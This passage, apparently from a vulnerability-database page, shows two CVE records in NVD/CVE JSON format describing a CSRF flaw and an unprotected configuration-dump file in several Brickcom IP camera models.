      "url": "http://seclists.org/fulldisclosure/2013/Jun/84"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-264"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

cve-2013-3690
Vulnerability from cvelistv5
Published
2013-10-01 19:00
Modified
2024-09-17 04:28
Severity ?
Summary
Cross-site request forgery (CSRF) vulnerability in cgi-bin/users.cgi in Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.1.0.8 and earlier, allows remote attackers to hijack the authentication of administrators for requests that add users.
References
http://seclists.org/fulldisclosure/2013/Jun/84mailing-list, x_refsource_FULLDISC
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T16:14:56.653Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20130612 Security Analysis of IP video surveillance cameras",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2013/Jun/84"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Cross-site request forgery (CSRF) vulnerability in cgi-bin/users.cgi in Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.1.0.8 and earlier, allows remote attackers to hijack the authentication of administrators for requests that add users."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-10-01T19:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20130612 Security Analysis of IP video surveillance cameras",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2013/Jun/84"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-3690",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Cross-site request forgery (CSRF) vulnerability in cgi-bin/users.cgi in Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.1.0.8 and earlier, allows remote attackers to hijack the authentication of administrators for requests that add users."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20130612 Security Analysis of IP video surveillance cameras",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2013/Jun/84"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-3690",
    "datePublished": "2013-10-01T19:00:00Z",
    "dateReserved": "2013-05-29T00:00:00Z",
    "dateUpdated": "2024-09-17T04:28:59.577Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2013-3689
Vulnerability from cvelistv5
Published
2013-10-04 23:00
Modified
2024-09-17 03:38
Severity ?
Summary
Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.0.6.16C1 and earlier, do not properly restrict access to configfile.dump, which allow remote attackers to obtain sensitive information (user names, passwords, and configurations) via a get action.
References
http://seclists.org/fulldisclosure/2013/Jun/84mailing-list, x_refsource_FULLDISC
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T16:14:56.820Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20130612 Security Analysis of IP video surveillance cameras",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2013/Jun/84"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.0.6.16C1 and earlier, do not properly restrict access to configfile.dump, which allow remote attackers to obtain sensitive information (user names, passwords, and configurations) via a get action."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-10-04T23:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20130612 Security Analysis of IP video surveillance cameras",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2013/Jun/84"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-3689",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, and possibly other camera models with firmware 3.0.6.16C1 and earlier, do not properly restrict access to configfile.dump, which allow remote attackers to obtain sensitive information (user names, passwords, and configurations) via a get action."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20130612 Security Analysis of IP video surveillance cameras",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2013/Jun/84"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-3689",
    "datePublished": "2013-10-04T23:00:00Z",
    "dateReserved": "2013-05-29T00:00:00Z",
    "dateUpdated": "2024-09-17T03:38:30.242Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}